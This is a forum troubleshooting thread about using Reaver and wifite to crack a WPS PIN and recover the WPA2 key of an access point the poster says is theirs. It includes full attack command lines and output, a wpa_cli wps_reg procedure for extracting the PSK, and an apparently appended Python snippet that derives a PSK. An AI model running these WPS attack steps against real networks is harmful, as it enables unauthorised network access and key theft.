Page 1 of 2 (Results 1 to 10 of 12)

Thread: wifite.py + reaver to retrieve WPA2 pass phrase

  1. #1
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default wifite.py + reaver to retrieve WPA2 pass phrase

    I am running these tools against my home network.

    I am running first wifite.py (http://www.backtrack-linux.org/forum...ad.php?t=48161) and then reaver.
    I know wifite.py is very capable of cracking WPS-enabled APs. However, this time it cracked the correct WPS PIN but not the passphrase, hence I ran reaver to crack the passphrase. I ran it 4 times and each time it retrieved a different passphrase; none of the 4 are correct. Please see the detailed output below.

    I would be keen to know the reason for this, please.

    Regards

    Code:
    root@bt:~# uname -a
    Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
    
    root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from D0:7D:33:6E:A7:B7
    [+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 11 seconds
    [+] WPS PIN: '18794786'
    [+] WPA PSK: 'aa0a90d4868af15113e51e818e437a6726f75efc7c38d1c9947f26377324f389'
    [+] AP SSID: 'Security'
    [+] Nothing done, nothing to save.
    root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from D0:7D:33:6E:A7:B7
    [+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 26 seconds
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '3b3c94285738ab32c88274bebbc7fc9641c2ed123ada4e55dca897ca57ce8e05'
    [+] AP SSID: 'Security'
    You have new mail in /var/mail/root
    root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from D0:7D:33:6E:A7:B7
    [+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 30 seconds
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '6437b12e41d82c03f53f23993b79a03b728dbc4dffae116ade802cb3a941e6ec'
    [+] AP SSID: 'Security'
    You have new mail in /var/mail/root
    root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from D0:7D:33:6E:A7:B7
    [+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 18794786
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 13 seconds
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '9402de2456f497009bd2725123dd97c05b9a947373187893eb41790024185283'
    [+] AP SSID: 'Security'
    [+] Nothing done, nothing to save.
    root@bt:~#

  2. #2
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    I see the topic is moved. Hopefully someone will respond now.
    Thanks

  3. #3
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Hi all.. I am hoping at least someone can point me to some other resources where I can possibly find the answer to my query..

    regards

  4. #4
    Member longjidin's Avatar
    Join Date
    Feb 2010
    Location
    Kg Lengkong to Bukit Lada
    Posts
    93

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Ok, I think it's better you follow this http://code.google.com/p/wifite/ and this https://github.com/derv82/wifite; with this tutorial I'm confident you can understand how wifite + reaver work together......


    Good Luck

  5. #5
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Quote Originally Posted by longjidin View Post
    Ok, I think it's better you follow this http://code.google.com/p/wifite/ and this https://github.com/derv82/wifite; with this tutorial I'm confident you can understand how wifite + reaver work together......


    Good Luck

    Hey, thanks.. I think I have moved on from wifite.py (great tool, really). This now pertains only to the Reaver tool. The question is: for the same WPS PIN, why does Reaver crack different passphrases (none of them work, by the way)?

  6. #6
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default reaver retrieves WPA2 PIN but not the correct pass phrase

    OK, reviving this old post of mine..
    I have now installed Reaver v1.3 and am still trying to crack my AP.. it's getting the correct PIN but not the passphrase.

    Code:
    root@bt:~# reaver -i mon0 -b F0:7D:68:6E:A7:E8 -e Security -c 11 -p 18794786
    
    Reaver v1.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Waiting for beacon from F0:7D:68:6E:A7:E8
    [+] Associated with F0:7D:68:6E:A7:E8 (ESSID: Security)
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '238ae6076460e99efbf7a5e3940db4fbe7f35cf61a7972444f04bfd3847941e7'
    [+] AP SSID: 'Security'
    
    root@bt:~# reaver -i mon0 -b F0:7D:68:6E:A7:E8 -e Security -c 11 -p 18794786
    
    Reaver v1.3 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Waiting for beacon from F0:7D:68:6E:A7:E8
    [+] Associated with F0:7D:68:6E:A7:E8 (ESSID: Security)
    [+] WPS PIN: '18794786'
    [+] WPA PSK: '395038100f4cf0940101bd7ec69adab509af5f189af1931db576d9198160819c'
    [+] AP SSID: 'Security'
    Quite curious here..

    Have looked over here:
    http://code.google.com/p/reaver-wps/issues/list

    But nothing is really pointing me in the right direction. I just had a feeling that Reaver v1.3 is a bit better than Reaver v1.4; however, I am still getting the same error.

    Any pointers? It's really a Reaver issue and not a wifite.py issue.

  7. #7
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    If the PIN is correct, you can use wpa_supplicant and wpa_cli to authenticate to the router, and then read the PSK either from the router config page or wpa_supplicant.conf. There is info on how to do this in the Reaver googlecode issues section. Reaver often gives me the PIN but not the PSK, and I can confirm this method works.

  8. #8
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Quote Originally Posted by VulpiArgenti View Post
    If the PIN is correct, you can use wpa_supplicant and wpa_cli to authenticate to the router, and then read the PSK either from the router config page or wpa_supplicant.conf. There is info on how to do this in the Reaver googlecode issues section. Reaver often gives me the PIN but not the PSK, and I can confirm this method works.
    First of all, thanks a lot to VulpiArgenti. Let me first warn the readers that this is going to be a long message.

    I am still not able to successfully retrieve the passphrase though I know this method works as I have tested it with other routers.

    Explaining method: All credit goes to this poster:

    http://code.google.com/p/reaver-wps/.../detail?id=203

    ________

    First, set yourself up a very basic wpa_supplicant.conf in /etc/wpa_supplicant.conf:
    --
    ctrl_interface=/var/run/wpa_supplicant
    ctrl_interface_group=0
    update_config=1
    --

    Second, start wpa_supplicant in daemon mode:
    wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf -B

    Third, run wpa_cli, and verify that it's working by issuing command 'status'.
    You should see wpa_state=INACTIVE

    Fourth, let's add our BSSID and PIN:
    wps_reg <bssid> <wps pin>
    wps_reg aa:bb:cc:dd:ee:ff 18794786

    You should see an "OK". Wait a few more seconds as wpa_supplicant picks up the BSSID
    and tries to associate and perform key negotiation. What you want to see is
    "CTRL-EVENT-CONNECTED", which will indicate that the PIN was accepted and that you're
    now associated.

    At this point, if you were to exit wpa_cli, you could run dhclient on wlan0
    and would be offered an IP from the AP, assuming DHCPd were enabled.

    Go ahead and type the command 'save' at wpa_cli terminal, which should output another "OK".
    This will update the wpa_supplicant.conf file, as specified from the command line,
    with a static configuration for this new network.

    Verify by: cat /etc/wpa_supplicant.conf

    If all went well, you should have a line under this new network titled 'psk'.
    That is the ssid passphrase
    ___________

    Now here is my output of the events:

    I have created the wpa_supplicant.conf and then start the wpa_supplicant in daemon mode in one terminal

    Then I open another terminal and start wpa_cli
    Please see the output of these two terminals:

    Code:
    root@bt:/etc# wpa_cli
    wpa_cli v0.6.9
    Copyright (c) 2004-2009, Jouni Malinen <j@w1.fi> and contributors
    
    This program is free software. You can distribute it and/or modify it
    under the terms of the GNU General Public License version 2.
    
    Alternatively, this software may be distributed under the terms of the
    BSD license. See README and COPYING for more details.
    
    
    Selected interface 'wlan0'
    
    Interactive mode
    
    > status
    wpa_state=INACTIVE
    
    > wps_reg aa:bb:cc:dd:ee:ff 18794786
    OK
    > <2>CTRL-EVENT-SCAN-RESULTS 
    <2>WPS-AP-AVAILABLE 
    <2>Trying to associate with aa:bb:cc:dd:ee:ff (SSID='Security' freq=2462 MHz)
    <2>CTRL-EVENT-SCAN-RESULTS 
    <2>WPS-AP-AVAILABLE 
    <2>Associated with aa:bb:cc:dd:ee:ff
    <2>CTRL-EVENT-EAP-STARTED EAP authentication started
    <2>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
    <2>CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
    <2>CTRL-EVENT-SCAN-RESULTS 
    <2>WPS-AP-AVAILABLE-PIN 
    
    root@bt:/etc#
    and the corresponding wpa_supplicant daemon output:

    Code:
    root@bt:/etc# wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf -B
    WPS-AP-AVAILABLE 
    WPS-AP-AVAILABLE 
    WPS-AP-AVAILABLE 
    Trying to associate with aa:bb:cc:dd:ee:ff (SSID='Security' freq=2462 MHz)
    WPS-AP-AVAILABLE 
    Associated with aa:bb:cc:dd:ee:ff
    WPA: No wpa_ie set - cannot generate msg 2/4
    CTRL-EVENT-EAP-STARTED EAP authentication started
    CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    WPA: No wpa_ie set - cannot generate msg 2/4
    So somehow it's not working for me..

    One time it did work and I saved the wpa_supplicant.conf file but the passphrase was garbage again.

    Code:
    root@bt:/etc# cat wpa_supplicant.conf
    ctrl_interface=/var/run/wpa_supplicant
    ctrl_interface_group=0
    update_config=1
    
    network={
    	ssid="Security"
    	bssid=aa:bb:cc:dd:ee:ff
    	psk=692c966e5ff1eff5e16c698036d87d5bbe94cdb73d7f14b64eac6331be561019
    	proto=RSN
    	key_mgmt=WPA-PSK
    	pairwise=CCMP
    	auth_alg=OPEN
    Driving me nuts at the moment.

  9. #9
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
    This suggests the PIN is wrong, or the AP is locked, or wpa_cli is not configured correctly (for your router).

    You could look at further commands to wpa_cli, e.g. increase the debugging level, force reassociation (see man), and also run wpa_supplicant with the debug flag (-dd). Could also attempt to reconfigure the router with wpa_supplicant?? That's the limit of my knowledge, I'm afraid.

  10. #10
    Just burned his ISO
    Join Date
    Jul 2012
    Posts
    3

    Default Re: wifite.py + reaver to retrieve WPA2 pass phrase

    Just to clarify, there seems to be some confusion between the passphrase and the pre-shared key (PSK) here.

    The passphrase is what you configure on your router/AP. It is similar to a password, and (relatively) easy to remember. Your router/AP does not use this for encryption. The actual key (PSK) is calculated by applying a key-derivation function which is salted with the router's SSID.

    VulpiArgenti's post above sounds about right. I was messing about with my own network settings yesterday, configuring network settings without using either network manager or WICD. I ran into the same issue with the disconnect event a number of times. It seems that there are a few different ways of configuring the wpa_supplicant.conf file, and that the network can be a bit fussy about that.
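The passphrase/PSK distinction in post #10 can be checked directly by the owner of the network: the 64-hex "WPA PSK" values Reaver printed are raw 256-bit keys, not passphrases, and whoever knows the real passphrase and the SSID ("Security" in the thread) can derive the genuine PSK with PBKDF2 and compare. The Python below is an added example, not code from the thread, from Reaver or from wpa_supplicant; the passphrase in it is constructed, and the two reported keys are copied from the thread's output.

```python
import hashlib
import re

# Constructed values for the demo: the SSID is the one shown in the thread, the
# passphrase is made up because the poster's real one is of course not known.
SAMPLE_SSID = "Security"
SAMPLE_PASSPHRASE = "hypothetical passphrase"   # constructed, not real

# Two of the 64-hex "WPA PSK" values Reaver printed in the thread.
REPORTED_IN_THREAD = [
    "aa0a90d4868af15113e51e818e437a6726f75efc7c38d1c9947f26377324f389",
    "3b3c94285738ab32c88274bebbc7fc9641c2ed123ada4e55dca897ca57ce8e05",
]

HEX64 = re.compile(r"^[0-9a-fA-F]{64}$")


def is_raw_psk(value: str) -> bool:
    """True when `value` is a 256-bit key written as 64 hex digits.

    wpa_supplicant.conf takes either psk="passphrase" (quoted text) or
    psk=<64 hex digits> (the key itself); Reaver's "WPA PSK" line is the latter.
    """
    return HEX64.match(value) is not None


def is_valid_passphrase(value: str) -> bool:
    """WPA/WPA2 passphrases are 8 to 63 printable ASCII characters (0x20-0x7e)."""
    return 8 <= len(value) <= 63 and all(0x20 <= ord(c) <= 0x7E for c in value)


def derive_psk(passphrase: str, ssid: str) -> str:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, salt=ssid, 4096 iterations, 32 bytes).

    This is the standard WPA-PSK derivation (the same computation the
    wpa_passphrase tool performs); because the SSID is the salt, one passphrase
    yields a different key on every differently named network.
    """
    if not is_valid_passphrase(passphrase):
        raise ValueError("passphrase must be 8-63 printable ASCII characters")
    key = hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                              ssid.encode("utf-8"), 4096, 32)
    return key.hex()


def matches_known_passphrase(reported_psk: str, passphrase: str, ssid: str) -> bool:
    """Owner's check: does a reported raw PSK equal the key derived from the
    network's real passphrase and SSID? A mismatch means the reported value is
    simply not this network's key, whatever tool printed it."""
    if not is_raw_psk(reported_psk):
        return False
    return reported_psk.lower() == derive_psk(passphrase, ssid)


if __name__ == "__main__":
    genuine = derive_psk(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    print(f"PSK derived from the constructed passphrase on '{SAMPLE_SSID}': {genuine}")
    for reported in REPORTED_IN_THREAD:
        verdict = matches_known_passphrase(reported, SAMPLE_PASSPHRASE, SAMPLE_SSID)
        print(f"{reported[:16]}... matches the derived key: {verdict}")
```

A passphrase-derived key also explains why every run in the thread could print a different 64-hex string without any of them working: only one value can equal PBKDF2(passphrase, "Security"), and the check above tells the owner which, if any, that is.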
